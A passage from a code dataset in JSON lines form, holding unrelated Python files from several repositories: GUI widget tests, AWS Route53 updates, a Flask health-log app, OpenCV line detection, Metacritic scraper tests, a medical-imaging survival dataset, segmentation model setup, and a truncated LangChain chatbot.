wx.BoxSizer(const.HORIZONTAL)\n\t\t\tself.SetSizer(self.box)\n\t\t\tself.entry = Entry(self, '', size=size, width=width)#,\n\t\t\t\t\t\t#onchange=self._check_entry, onenter=self._entry_enter)\n\t\t\tself.box.Add(self.entry, 0, wx.ALL)\n\t\t\tsize = (-1, self.entry.GetSize()[1])\n\t\t\tself.sb = SpinButton(self, size=size)#, onchange=self._check_spin)\n\t\t\tself.box.Add(self.sb, 0, wx.ALL)\n\n\nclass WidgetPanel(HPanel):\n\n\tname = 'Basic widgets'\n\tspin = None\n\n\tdef __init__(self, parent):\n\t\tHPanel.__init__(self, parent)\n\t\tself.build()\n\n\tdef build(self):\n\t\tflags = LEFT | CENTER\n\t\tpflags = ALL | EXPAND\n\t\tself.add(FloatSpin(self), 0, ALL, 2)\n\t\tself.add(FloatSpin(self), 0, ALL, 2)\n\n\napp = Application('wxWidgets')\nmw = MainWindow('Spin widget', (300, 250))\np = VPanel(mw)\nmw.add(p, 1, ALL | EXPAND)\npanel = WidgetPanel(mw)\np.add(panel, 1, ALL | EXPAND, 10)\napp.mw = mw\napp.run()\n","repo_name":"peterockpile/print-design","sub_path":"src/ui-tests/spin_control.py","file_name":"spin_control.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"37062964392","text":"\n\nfrom Route53 import Route53\n\nclass namerecord:\n def __init__(self, recordname, recordtype, ttl, DNSZone, region, newelbname, currentelbname=None):\n self._recordname = recordname\n self._recordtype = recordtype\n self._ttl = ttl\n self._DNSZone = DNSZone\n self._region = region\n self._newelbname = newelbname\n self._currentelbname = currentelbname\n \n def update(self):\n #instantiate Record changelist\n updaterecord = Route53(self._recordname, self._DNSZone, self._recordtype, self._ttl, self._region, self._currentelbname)\n #get current elb info and add delete record change to list\n currentelbendpoint = updaterecord.getelbinfo(self._currentelbname)\n updaterecord.deleterecord(currentelbendpoint)\n #get new elb info and add create record change to list\n newelbendpoint = updaterecord.getelbinfo(self._newelbname)\n updaterecord.createrecord(newelbendpoint)\n updaterecord.commitrecord() \n \n def create(self):\n #Get ELB info \n updaterecord = Route53(self._recordname, self._DNSZone, self._recordtype, self._ttl, self._region, self._newelbname)\n newelbendpoint = updaterecord.getelbinfo(self._newelbname)\n updaterecord.createrecord(newelbendpoint)\n updaterecord.commitrecord() \n\n \n \n \n","repo_name":"grantleehoffman/BGDeploy","sub_path":"bgdeploy/project/namerecord.py","file_name":"namerecord.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"25201409339","text":"import flask \nfrom flask import request, make_response\nfrom main import app, db\nfrom main.models import Entry\nfrom sqlalchemy import desc\nimport datetime\nfrom io import StringIO\nimport csv\n\n@app.route('/', methods=['get','post'])\ndef show_entry():\n return flask.render_template('entry.html')\n\n@app.route('/entry-done', methods=['GET','POST'])\ndef add_entry():\n entry = Entry(\\\n line_id =flask.request.form['line_id']\\\n ,line_name =flask.request.form['line_name']\\\n ,temp =flask.request.form['temp']\\\n ,date =datetime.datetime.now()\\\n ,breathlessness =flask.request.form['breathlessness']\\\n ,dullness =flask.request.form['dullness']\\\n ,comment =flask.request.form['comment'])\n db.session.add(entry)\n db.session.commit()\n specified_id = request.form.get('line_id')\n specified_name = request.form.get('line_name')\n sorted_result = db.session.query(Entry)\\\n .filter(Entry.line_id == specified_id)\\\n .order_by(desc(Entry.date))\\\n .all()\n return flask.render_template('logs-result.html', specified_id=specified_id, specified_name=specified_name, sorted_result=sorted_result)\n\n@app.route('/logs-ent', methods=['GET','POST'])\ndef show_logsent():\n return flask.render_template('logs-ent.html')\n\n@app.route('/logs-result', methods=['GET','post'])\ndef sort_logs():\n specified_id = request.form.get('line_id')\n specified_name = request.form.get('line_name')\n sorted_result = db.session.query(Entry)\\\n .filter(Entry.line_id == specified_id)\\\n .order_by(desc(Entry.date))\\\n .all()\n return flask.render_template('logs-result.html', specified_id=specified_id, specified_name=specified_name, sorted_result=sorted_result)\n\n@app.route('/download//', methods=['get','post'])\ndef download_csv(key):\n f = StringIO()\n writer = csv.writer(f, quotechar='\"', quoting=csv.QUOTE_ALL, lineterminator=\"\\n\")\n\n if key == 'all':\n writer.writerow(['id','line_name','date','temp','breathlessness','dullness','comment'])\n for i in Entry.query.order_by(Entry.id.desc()).all():\n writer.writerow([i.id, i.line_name, i.date, i.temp, i.breathlessness, i.dullness, i.comment])\n else:\n writer.writerow(['管理No','LINE名','記録日時','体温','息つらい','体だるい','その他メモ'])\n for i in Entry.query.filter(Entry.line_id == key).order_by(Entry.id.desc()).all():\n writer.writerow([i.id, i.line_name ,i.date.strftime('%a %m-%d %H:%M'), i.temp, i.breathlessness, i.dullness, i.comment])\n \n dt_now = datetime.datetime.now()\n res = make_response()\n res.data = f.getvalue()\n res.headers['Content-Type'] = 'text/csv'\n res.headers['Content-Disposition'] = 'attachment; filename = ken-on-log_'+ dt_now.strftime('%Y%m%d-%H:%M:%S') +'.csv'\n return res\n\n\n\n# SQLクエリの書き方\n# 本来の記述はsessionを使う。 db.session.query(Entry).all()\n# 'Entry'クラスが持つヘルパー機能のため Entry.query.all()  に省略可能\n# 'Entry' クラス名=テーブル名\n# .query クエリ(指示)\n# order_by(Entry.id.desc()) 'id'カラムの降順で\n# .all() 全件取得","repo_name":"kazuyamano/ken-on-kun-liff","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"12469227825","text":"import cv2\nimport numpy as np\nimg=cv2.imread(\"C:/Users/Windows 10/Downloads/sudoku.png\")\ngray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\nedges=cv2.Canny(gray,50,50)\ncv2.imshow(\"Original\",img)\n#output vector of edges of lines\nlines=cv2.HoughLines(edges,1,np.pi/180,200)\nfor line in lines:\n rho,theta=line[0]\n x0=rho*np.cos(theta)\n y0=rho*np.sin(theta)\n x1=int(x0-1000*np.sin(theta))\n y1=int(y0+1000*np.cos(theta))\n x2=int(x0+1000*np.sin(theta))\n y2=int(y0-1000*np.cos(theta))\n cv2.line(img,(x1,y1),(x2,y2),(0,255,255),2)\n print(f\"points:({x1},{y1}),({x2},{y2})\")\ncv2.imshow(\"Image\",img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"Akash-Krishna-PM/Activity","sub_path":"2022_01_19/hough.py","file_name":"hough.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"11140459286","text":"# pylint: disable=missing-function-docstring, too-many-function-args, missing-module-docstring\n\nimport os\nfrom unittest.mock import MagicMock, patch\n\nimport pytest\nfrom bs4 import BeautifulSoup\nfrom scrapers.metacritic.scrape_games_data import *\nfrom scrapers.metacritic.scrape_games_lists import *\nfrom scrapers.metacritic.scrape_metacritic_reviews import *\nfrom scrapers.metacritic.scrape_user_reviews import *\nfrom scrapers.metacritic.scrape_utils import *\n\n########################################################################\n# Scrape Games Data\n########################################################################\n\n\ndef test_fuzzy_match():\n # Test fuzzy matching with different thresholds\n\n game_names = [\"Halo\", \"Forza Horizon\", \"Gears of War\"]\n\n # Test exact match (threshold = 0)\n assert fuzzy_match(\"Halo 3\", game_names, threshold=60) == \"Halo\"\n\n # Test looser match (threshold = 20)\n assert fuzzy_match(\"Gears\", game_names, threshold=20) == \"Gears of War\"\n\n # Test stricter match (threshold = 80)\n assert fuzzy_match(\"Halo 3\", game_names, threshold=80) == \"Halo\"\n\n\n@pytest.fixture\ndef example_df() -> pd.DataFrame:\n # Create an example DataFrame for testing\n return pd.DataFrame({\"Name\": [\"xdxdxdxd\", \"Terraria\", \"CrossfireX\"]})\n\n\ndef test_add_gamepass_status(example_df):\n # Test the add_gamepass_status function\n\n # Generate output DataFrame\n output_df = add_gamepass_status(example_df)\n\n # Assert column names in the output DataFrame\n assert set(output_df.columns) == {\"Name\", \"Gamepass_Status\"}\n\n # Assert Gamepass status for specific rows\n assert output_df.loc[0, \"Gamepass_Status\"] == \"Not Included\"\n assert output_df.loc[1, \"Gamepass_Status\"] == \"Active\"\n assert output_df.loc[2, \"Gamepass_Status\"] == \"Removed\"\n\n\ndef test_scrape_game_data():\n # Test the scrape_game_data function with a specific link\n\n link = \"https://www.metacritic.com/game/switch/the-legend-of-zelda-links-awakening\"\n\n # Scrape game data\n game_data = scrape_game_data(link)\n\n # Assert the extracted game data\n assert game_data is not None\n assert game_data[\"Name\"] == \"The Legend of Zelda: Link's Awakening\"\n assert game_data[\"Release Date\"] == \"2019-09-20\"\n assert game_data[\"Maturity Rating\"] == \"E\"\n assert game_data[\"Genre\"] == \"Action Adventure, Open-World\"\n assert game_data[\"Developer\"] == \"Nintendo\"\n assert game_data[\"Publisher\"] == \"Nintendo\"\n # Update the following assertions to the latest values for accurate testing\n # assert int(game_data[\"Meta Score\"]) == 87\n # assert int(game_data[\"Critic Reviews Count\"]) == 111\n # assert game_data[\"User Score\"] == 8.4\n # assert game_data[\"User Rating Count\"] == 1653\n assert \"Summary\" in game_data\n\n\ndef test_extract_game_data():\n # Test the extract_game_data function with specific input data and soup\n\n # Sample input data\n data = {\n \"name\": \"The Legend of Zelda: Link's Awakening\",\n \"gamePlatform\": \"Nintendo Switch\",\n \"description\": \"Summary of the game\",\n \"image\": \"https://example.com/game_image.jpg\",\n \"datePublished\": \"September 20, 2019\",\n \"contentRating\": \"ESRB E\",\n \"genre\": [\"Action Adventure\", \"Open-World\"],\n \"publisher\": [{\"name\": \"Nintendo\"}],\n \"aggregateRating\": {\"ratingValue\": 87},\n }\n\n # Sample input soup\n soup = BeautifulSoup(\n \"\"\"\n\n \n 111 reviews\n
8.4
\n [\n
\n

\n Universal acclaim\n \n - based\n on \n 86\n Critic Reviews \n What's this? \n

\n
\n , \n
\n

Generally favorable\n reviews- based on 3735 Ratings\n

\n
\n ]\n \n\n \"\"\",\n \"html.parser\",\n )\n\n # Extract game data\n game_data = extract_game_data(data, soup)\n\n # Assert the extracted game data\n assert game_data[\"Name\"] == \"The Legend of Zelda: Link's Awakening\"\n assert game_data[\"Release Date\"] == \"2019-09-20\"\n assert game_data[\"Maturity Rating\"] == \"E\"\n assert game_data[\"Genre\"] == \"Action Adventure, Open-World\"\n assert game_data[\"Platform\"] == \"Nintendo Switch\"\n assert game_data[\"Developer\"] == \"Nintendo\"\n assert game_data[\"Publisher\"] == \"Nintendo\"\n assert game_data[\"Meta Score\"] == 87\n assert game_data[\"Summary\"] == \"Summary of the game\"\n assert game_data[\"Image\"] == \"https://example.com/game_image.jpg\"\n assert game_data[\"Critic Reviews Count\"] == 111\n assert game_data[\"User Score\"] == 8.4\n assert game_data[\"User Rating Count\"] == 3735\n\n\ndef test_extract_release_date():\n # Test the extract_release_date function with different input data\n data = {\"datePublished\": \"September 20, 2019\"}\n assert extract_release_date(data) == \"2019-09-20\"\n\n data = {\"datePublished\": \"\"}\n assert extract_release_date(data) == \"\"\n\n data = {}\n assert extract_release_date(data) == \"\"\n\n\ndef test_extract_maturity_rating():\n # Test the extract_maturity_rating function with different input data\n data = {\"contentRating\": \"ESRB E\"}\n assert extract_maturity_rating(data) == \"E\"\n\n data = {\"contentRating\": \"\"}\n assert extract_maturity_rating(data) == \"\"\n\n data = {}\n assert extract_maturity_rating(data) == \"Unspecified\"\n\n\ndef test_extract_genre():\n # Test the extract_genre function with different input data\n data = {\"genre\": [\"Action\", \"Adventure\"]}\n assert extract_genre(data) == \"Action, Adventure\"\n\n data = {\"genre\": []}\n assert extract_genre(data) == \"\"\n\n data = {}\n assert extract_genre(data) == \"\"\n\n\ndef test_extract_developer():\n # Test the extract_developer function with different input soup\n soup = BeautifulSoup(\n \"\", \"html.parser\"\n )\n assert extract_developer(soup) == \"Nintendo\"\n\n soup = BeautifulSoup(\"\", \"html.parser\")\n assert extract_developer(soup) == \"\"\n\n\ndef test_extract_publisher():\n # Test the extract_publisher function with different input data\n data = {\"publisher\": [{\"name\": \"Nintendo\"}, {\"name\": \"Sony\"}]}\n assert extract_publisher(data) == \"Nintendo, Sony\"\n\n data = {\"publisher\": []}\n assert extract_publisher(data) == \"\"\n\n data = {}\n assert extract_publisher(data) == \"\"\n\n\ndef test_extract_meta_score():\n # Test the extract_meta_score function with different input data\n data = {\"aggregateRating\": {\"ratingValue\": 87}}\n assert extract_meta_score(data) == 87\n\n data = {\"aggregateRating\": {}}\n assert extract_meta_score(data) is None\n\n data = {}\n assert extract_meta_score(data) is None\n\n\ndef test_extract_critic_review_count():\n # Test the extract_critic_review_count function with different input soup\n soup = BeautifulSoup(\n \"\"\"\n \n 111 reviews\n
Some other information
\n \n \"\"\",\n \"html.parser\",\n )\n assert extract_critic_review_count(soup) == 111\n\n soup = BeautifulSoup(\n \"\"\"\n \n
Some other information
\n \n \"\"\",\n \"html.parser\",\n )\n assert extract_critic_review_count(soup) == 0\n\n\ndef test_extract_user_score():\n # Test the extract_user_score function with different input soup\n soup = BeautifulSoup(\n \"\"\"\n \n
8.4
\n
Some other information
\n \n \"\"\",\n \"html.parser\",\n )\n assert extract_user_score(soup) == 8.4\n\n soup = BeautifulSoup(\n \"\"\"\n \n
tbd
\n
Some other information
\n \n \"\"\",\n \"html.parser\",\n )\n assert extract_user_score(soup) is None\n\n soup = BeautifulSoup(\n \"\"\"\n \n
Some other information
\n \n \"\"\",\n \"html.parser\",\n )\n assert extract_user_score(soup) is None\n\n\ndef test_extract_user_rating_count():\n # Test the extract_user_rating_count function with different input soup\n soup = BeautifulSoup(\n \"\"\"\n \n\n \n 111 reviews\n
8.4
\n [\n
\n

\n Universal acclaim\n \n - based\n on \n 86\n Critic Reviews \n What's this? \n

\n
\n , \n
\n

Generally favorable\n reviews- based on 3735 Ratings\n

\n
\n ]\n \n\n \"\"\",\n \"html.parser\",\n )\n assert extract_user_rating_count(soup) == 3735\n\n soup = BeautifulSoup(\n \"\"\"\n \n
Some other information
\n \n \"\"\",\n \"html.parser\",\n )\n assert extract_user_rating_count(soup) == 0\n","repo_name":"Liftingthedata/xbox_de_project","sub_path":"tests/test_metacritic_scrape_games.py","file_name":"test_metacritic_scrape_games.py","file_ext":"py","file_size_in_byte":10088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"8292351848","text":"import os\nfrom traceback import print_tb\nfrom typing import Callable, Optional, Tuple\nimport sys\n\nimport SimpleITK as sitk\nfrom pathlib import Path\nimport torch\nfrom torch.utils.data import Dataset\nimport pandas as pd\nimport numpy as np\n\nimport nibabel as nib\nimport pathlib\nfrom einops import rearrange\n\nfrom joblib import Parallel, delayed\n\nfrom sklearn.preprocessing import scale\n\nfrom torchmtlr.utils import make_time_bins, encode_survival\n\n\ndef get_paths_to_patient_files(path_to_imgs, PatientID, append_mask=True):\n path_to_imgs = pathlib.Path(path_to_imgs)\n\n patients = [p for p in PatientID] # if os.path.isdir(path_to_imgs / p)\n paths = []\n for p in patients:\n print('p is ',p)\n print('path_to_imgs is ',path_to_imgs)\n path_to_ct = path_to_imgs / (p + '_image.nii.gz')\n\n if append_mask:\n path_to_mask = path_to_imgs/ (p + '_mask_GTV.nii.gz')\n paths.append((path_to_ct, path_to_mask))\n else:\n paths.append((path_to_ct))\n return paths\n\nclass HecktorDataset(Dataset):\n\n def __init__(self,\n root_directory:str, \n clinical_data_path:str, \n time_bins:int = 14,\n cache_dir:str = \"data_cropped/data_cache/\",\n transform: Optional[Callable] = None,\n num_workers: int = 1,\n num_classes: int = 2,\n patient_split:bool =True\n ):\n print(cache_dir)\n self.num_of_seqs = 1 #CT only\n # self.num_of_seqs = 2 #CT PT\n \n self.root_directory = root_directory\n\n self.transforms = transform\n self.num_workers = num_workers\n self.num_classes = num_classes\n\n self.clinical_data = self.make_data(clinical_data_path)\n \n # important, whether the time bins determine by number of event ################################\n\n if patient_split:\n self.time_bins1 = make_time_bins(times=self.clinical_data[\"time1\"], num_bins=time_bins)\n self.time_bins2 = make_time_bins(times=self.clinical_data[\"time2\"], num_bins=time_bins)\n self.time_bins3 = make_time_bins(times=self.clinical_data[\"time3\"], num_bins=time_bins)\n self.time_bins4 = make_time_bins(times=self.clinical_data[\"time4\"], num_bins=time_bins)\n self.time_bins5 = make_time_bins(times=self.clinical_data[\"time5\"], num_bins=time_bins)\n else:\n self.time_bins1 = make_time_bins(times=self.clinical_data[\"time1\"], num_bins=time_bins, event = self.clinical_data[\"event1\"])\n self.time_bins2 = make_time_bins(times=self.clinical_data[\"time2\"], num_bins=time_bins, event = self.clinical_data[\"event2\"])\n self.time_bins3 = make_time_bins(times=self.clinical_data[\"time3\"], num_bins=time_bins, event = self.clinical_data[\"event3\"])\n self.time_bins4 = make_time_bins(times=self.clinical_data[\"time4\"], num_bins=time_bins, event = self.clinical_data[\"event4\"])\n self.time_bins5 = make_time_bins(times=self.clinical_data[\"time5\"], num_bins=time_bins, event = self.clinical_data[\"event5\"])\n\n self.y1 = encode_survival(self.clinical_data[\"time1\"].values, self.clinical_data[\"event1\"].values, self.time_bins1) # single event\n self.y2 = encode_survival(self.clinical_data[\"time2\"].values, self.clinical_data[\"event2\"].values, self.time_bins2) # single event\n self.y3 = encode_survival(self.clinical_data[\"time3\"].values, self.clinical_data[\"event3\"].values, self.time_bins3) # single event\n self.y4 = encode_survival(self.clinical_data[\"time4\"].values, self.clinical_data[\"event4\"].values, self.time_bins4) # single event\n self.y5 = encode_survival(self.clinical_data[\"time5\"].values, self.clinical_data[\"event5\"].values, self.time_bins5) # single event\n\n\n self.cache_path = get_paths_to_patient_files(cache_dir, self.clinical_data['ID'])\n\n\n def make_data(self, path):\n\n try:\n print(path)\n df = pd.read_csv(path + '/Clinical_List_5_Outcome.csv')\n except:\n df = path\n\n clinical_data = df\n clinical_data = clinical_data.rename(columns={\"Death\": \"event1\", \"Dig2Follow\": \"time1\",\\\n \"LF\": \"event2\", \"Dig2LF\": \"time2\",\\\n \"RF\": \"event3\", \"Dig2RF\": \"time3\",\\\n \"DF\": \"event4\", \"Dig2DF\": \"time4\",\\\n \"SP\": \"event5\", \"Dig2SP\": \"time5\"})\n\n clinical_data[\"Age\"] = scale(clinical_data[\"Age\"])\n clinical_data[\"SMOKE1\"] = scale(clinical_data[\"SMOKE1\"])\n clinical_data[\"Dig2RT\"] = scale(clinical_data[\"Dig2RT\"])\n clinical_data[\"Dose\"] = scale(clinical_data[\"Dose\"])\n clinical_data[\"Fraction\"] = scale(clinical_data[\"Fraction\"])\n clinical_data[\"ECOG\"] = scale(clinical_data[\"ECOG\"])\n clinical_data[\"T\"] = scale(clinical_data[\"T\"])\n clinical_data[\"N\"] = scale(clinical_data[\"N\"])\n clinical_data[\"AJCC\"] = scale(clinical_data[\"AJCC\"])\n \n cols_to_drop = []\n\n clinical_data = clinical_data.drop(cols_to_drop, axis=1)\n \n return clinical_data\n\n def __getitem__(self, idx: int):\n \"\"\"Get an input-target pair from the dataset.\n\n The images are assumed to be preprocessed and cached.\n\n Parameters\n ----------\n idx\n The index to retrieve (note: this is not the subject ID).\n\n Returns\n -------\n tuple of torch.Tensor and int\n The input-target pair.\n \"\"\"\n \n try: # training data\n # clin_var_data = self.clinical_data.drop([\"target_binary\", 'time', 'event', 'Study ID'], axis=1) # single event\n clin_var_data = self.clinical_data.drop(['ID','time1', 'event1','time2', 'event2','time3', 'event3','time4', 'event4','time5', 'event5'], axis=1)\n except: # test data\n clin_var_data = self.clinical_data.drop(['ID'], axis=1)\n\n clin_var = clin_var_data.iloc[idx].to_numpy(dtype='float32')\n \n target = (self.y1[idx], self.y2[idx], self.y3[idx], self.y4[idx], self.y5[idx])\n \n labels = self.clinical_data.iloc[idx].to_dict()\n \n # path = self.cache_path, f\"{subject_id}_ct.nii.gz\")\n# print('hi:', path)\n \n # image = sitk.ReadImage(path)\n # if self.transform is not None:\n # image = self.transform(image)\n \n \n sample = dict()\n \n id_ = self.cache_path[idx][0].parent.stem\n\n sample['id'] = id_\n img = [self.read_data(self.cache_path[idx][i]) for i in range(self.num_of_seqs)]\n img = np.stack(img, axis=-1)\n sample['input'] = img \n \n mask = self.read_data(self.cache_path[idx][-1])\n mask = mask/255\n mask = np.expand_dims(mask, axis=3)\n sample['target_mask'] = mask\n \n if self.transforms:\n sample = self.transforms(sample)\n \n return (sample, clin_var), target, labels\n \n \n\n def __len__(self) -> int:\n \"\"\"Return the length of the dataset.\"\"\"\n return len(self.clinical_data)\n \n @staticmethod\n def read_data(path_to_nifti, return_numpy=True):\n if return_numpy:\n return sitk.GetArrayFromImage(sitk.ReadImage(str(path_to_nifti)))\n return sitk.ReadImage(str(path_to_nifti))\n # \"\"\"Read a NIfTI image. Return a numpy array (default) or `nibabel.nifti1.Nifti1Image` object\"\"\"\n # if return_numpy:\n # return nib.load(str(path_to_nifti)).get_fdata()\n # return nib.load(str(path_to_nifti))\n\n @staticmethod\n def to_categorical(y, num_classes):\n \"\"\" 1-hot encodes a tensor \"\"\"\n y = np.eye(num_classes+1, dtype='uint8')[y]\n return y[:,:,:,1:num_classes+1]\n","repo_name":"Meixu-Chen/MLSP","sub_path":"src/datamodules/components/hecktor_dataset.py","file_name":"hecktor_dataset.py","file_ext":"py","file_size_in_byte":7750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36534616210","text":"import torch\r\nimport torch.nn as nn\r\nimport os\r\nimport importlib\r\nimport torch.optim as optim\r\nfrom models.transform import Augmentation, BaseTransform\r\nfrom annotation.train_utils.coco_utils import CocoDetection\r\nfrom utils.utils import create_aspect_ratio_groups, GroupedBatchSampler\r\n\r\ndef weights_init(net, init_type='normal', init_gain = 0.02):\r\n def init_func(m):\r\n classname = m.__class__.__name__\r\n if hasattr(m, 'weight') and classname.find('Conv') != -1:\r\n if init_type == 'normal':\r\n torch.nn.init.normal_(m.weight.data, 0.0, init_gain)\r\n elif init_type == 'xavier':\r\n torch.nn.init.xavier_normal_(m.weight.data, gain=init_gain)\r\n elif init_type == 'kaiming':\r\n torch.nn.init.kaiming_normal_(m.weight.data, a=0, mode='fan_in')\r\n elif init_type == 'orthogonal':\r\n torch.nn.init.orthogonal_(m.weight.data, gain=init_gain)\r\n else:\r\n raise NotImplementedError('initialization method [%s] is not implemented' % init_type)\r\n elif classname.find('BatchNorm2d') != -1:\r\n torch.nn.init.normal_(m.weight.data, 1.0, 0.02)\r\n torch.nn.init.constant_(m.bias.data, 0.0)\r\n # print('initialize network with %s type' % init_type)\r\n net.apply(init_func)\r\n\r\ndef get_model(opt, train_mode=True): \r\n model = init_dt_model(opt, train_mode)\r\n criterion = init_loss(opt) \r\n return model, criterion\r\n\r\ndef init_dt_model(opt, train_mode=True):\r\n if opt.net == 'yolact':\r\n from inst_model.yolact.nets.yolact import Yolact\r\n model = Yolact(num_classes=opt.num_classes, pretrained=opt.pretrained, train_mode=train_mode)\r\n elif opt.net == 'Mask_RCNN': \r\n from inst_model.Mask_RCNN.net.backbone import resnet50_fpn_backbone\r\n from inst_model.Mask_RCNN.net.network_files import MaskRCNN\r\n backbone = resnet50_fpn_backbone(pretrain_path=\"model_data/weight/resnet50.pth\", trainable_layers=3)\r\n model = MaskRCNN(backbone, num_classes=opt.num_classes, use_pre_trained=opt.pretrained, train_mode=train_mode)\r\n\r\n if not train_mode: return model.eval()\r\n return model \r\n\r\ndef init_loss(opt):\r\n if opt.net == 'yolact':\r\n from inst_model.yolact.nets.yolact_training import Multi_Loss\r\n criterion = Multi_Loss(opt.num_classes, opt.anchors, 0.5, 0.4, 3) \r\n else:\r\n criterion = None\r\n return criterion \r\n\r\ndef get_optimizer(model, opt, optimizer_type): \r\n optimizer = {\r\n 'adam' : optim.Adam(model.parameters(), opt.Init_lr_fit, betas = (opt.momentum, 0.999), weight_decay = opt.weight_decay),\r\n 'adamw' : optim.AdamW(model.parameters(), opt.Init_lr_fit, betas = (opt.momentum, 0.999), weight_decay = opt.weight_decay),\r\n 'sgd' : optim.SGD(model.parameters(), opt.Init_lr_fit, momentum = opt.momentum, nesterov=True, weight_decay = opt.weight_decay)\r\n }[optimizer_type] \r\n return optimizer\r\n\r\ndef generate_loader(opt):\r\n if opt.exp_name == \"coco\":\r\n train_dataset = CocoDetection(opt.train_image_path, opt.train_coco, dataset=\"train\", net_type = opt.net, label_map = opt.COCO_LABEL_MAP, augmentation=Augmentation(opt.input_shape))\r\n val_dataset = CocoDetection(opt.val_image_path, opt.val_coco, dataset=\"val\", net_type = opt.net, label_map = opt.COCO_LABEL_MAP, augmentation=BaseTransform(opt.input_shape))\r\n if opt.net == 'yolact':\r\n from inst_model.yolact.utils.dataloader import yolact_dataset_collate \r\n dataset_collate = yolact_dataset_collate \r\n else:\r\n from inst_model.Mask_RCNN.utils.dataloader import mask_dataset_collate \r\n dataset_collate = mask_dataset_collate \r\n else:\r\n if opt.net == 'yolact':\r\n from inst_model.yolact.utils.dataloader import yolactDataset, yolact_dataset_collate \r\n train_dataset = yolactDataset(opt.train_image_path, opt.train_coco, opt.COCO_LABEL_MAP, Augmentation(opt.input_shape))\r\n val_dataset = yolactDataset(opt.val_image_path, opt.val_coco, opt.COCO_LABEL_MAP, BaseTransform(opt.input_shape))\r\n dataset_collate = yolact_dataset_collate \r\n\r\n elif opt.net == 'Mask_RCNN':\r\n from inst_model.Mask_RCNN.utils.dataloader import MaskDataset, mask_dataset_collate \r\n train_dataset = MaskDataset(opt.train_image_path, opt.train_coco, opt.COCO_LABEL_MAP, Augmentation(opt.input_shape))\r\n val_dataset = MaskDataset(opt.val_image_path, opt.val_coco, opt.COCO_LABEL_MAP, BaseTransform(opt.input_shape)) \r\n dataset_collate = mask_dataset_collate \r\n\r\n batch_size = opt.batch_size\r\n if opt.distributed:\r\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset, shuffle=True,)\r\n val_sampler = torch.utils.data.distributed.DistributedSampler(val_dataset, shuffle=False,)\r\n batch_size = batch_size // opt.ngpus_per_node\r\n shuffle = False\r\n else:\r\n train_sampler = None\r\n val_sampler = None\r\n shuffle = True\r\n\r\n if opt.net == 'Mask_RCNN':\r\n # 是否按图片相似高宽比采样图片组成batch\r\n # 使用的话能够减小训练时所需GPU显存,默认使用\r\n if opt.aspect_ratio_group_factor >= 0:\r\n train_sampler = torch.utils.data.RandomSampler(train_dataset)\r\n # 统计所有图像高宽比例在bins区间中的位置索引\r\n group_ids = create_aspect_ratio_groups(train_dataset, k=opt.aspect_ratio_group_factor)\r\n # 每个batch图片从同一高宽比例区间中取\r\n train_batch_sampler = GroupedBatchSampler(train_sampler, group_ids, opt.batch_size)\r\n \r\n # 注意这里的collate_fn是自定义的,因为读取的数据包括image和targets,不能直接使用默认的方法合成batch\r\n batch_size = opt.batch_size\r\n nw = min([os.cpu_count(), batch_size if batch_size > 1 else 0, 8]) # number of workers\r\n print('Using %g dataloader workers' % nw)\r\n\r\n if train_sampler:\r\n # 如果按照图片高宽比采样图片,dataloader中需要使用batch_sampler\r\n gen = torch.utils.data.DataLoader(train_dataset,\r\n batch_sampler=train_batch_sampler,\r\n pin_memory=True,\r\n num_workers=nw,\r\n collate_fn=dataset_collate)\r\n gen_val = torch.utils.data.DataLoader(val_dataset,\r\n batch_size=1,\r\n shuffle=False,\r\n pin_memory=True,\r\n num_workers=nw,\r\n collate_fn=dataset_collate)\r\n else:\r\n gen = torch.utils.data.DataLoader(train_dataset, shuffle = shuffle, batch_size = batch_size, num_workers = opt.num_workers, pin_memory=True,\r\n drop_last=True, collate_fn=dataset_collate, sampler=None)\r\n gen_val = torch.utils.data.DataLoader(val_dataset , shuffle = shuffle, batch_size = batch_size, num_workers = opt.num_workers, pin_memory=True, \r\n drop_last=True, collate_fn=dataset_collate, sampler=val_sampler) \r\n \r\n else:\r\n gen = torch.utils.data.DataLoader(train_dataset, shuffle = shuffle, batch_size = batch_size, num_workers = opt.num_workers, pin_memory=True,\r\n drop_last=True, collate_fn=dataset_collate, sampler=train_sampler)\r\n gen_val = torch.utils.data.DataLoader(val_dataset , shuffle = shuffle, batch_size = batch_size, num_workers = opt.num_workers, pin_memory=True, \r\n drop_last=True, collate_fn=dataset_collate, sampler=val_sampler) \r\n return gen, gen_val","repo_name":"Leyan529/pytorch-instance-segmentation","sub_path":"models/init_model.py","file_name":"init_model.py","file_ext":"py","file_size_in_byte":8195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"17149881629","text":"from langchain.prompts import PromptTemplate\nfrom langchain.embeddings import HuggingFaceEmbeddings\nfrom langchain.vectorstores import FAISS\nfrom langchain.llms import HuggingFacePipeline\nfrom langchain.llms import CTransformers\nfrom InstructorEmbedding import INSTRUCTOR\nfrom langchain.embeddings import HuggingFaceInstructEmbeddings\nfrom langchain.chains import RetrievalQA\nimport chainlit as ct\nimport asyncio\n\nimport torch\nimport transformers\nfrom transformers import AutoTokenizer, AutoModelForCausalLM, pipeline\n\nDB_FAISS_PATH = 'faiss-meditations-index'\n\ncustom_prompt_template = \"\"\"You are an AI assistant helping users to understand different meditation techniques. Your knowledge base is a book named Vigyan Bhairava Tantra. Keep your answers short and simple. If question is not clear ask user to rephrase the question. Generate sample questions for the user to ask.\n\nContext: {context}\nQuestion: {context}\n\nResponse for Questions asked.\nanswer:\n\"\"\"\n\ndef create_prompt():\n \"\"\"\n Prompt template for QA retrieval for each vectorstore\n \"\"\"\n prompt = PromptTemplate(template=custom_prompt_template, input_variables=[\"context\", 'question'])\n return prompt\n\n#retreivel Chain\ndef 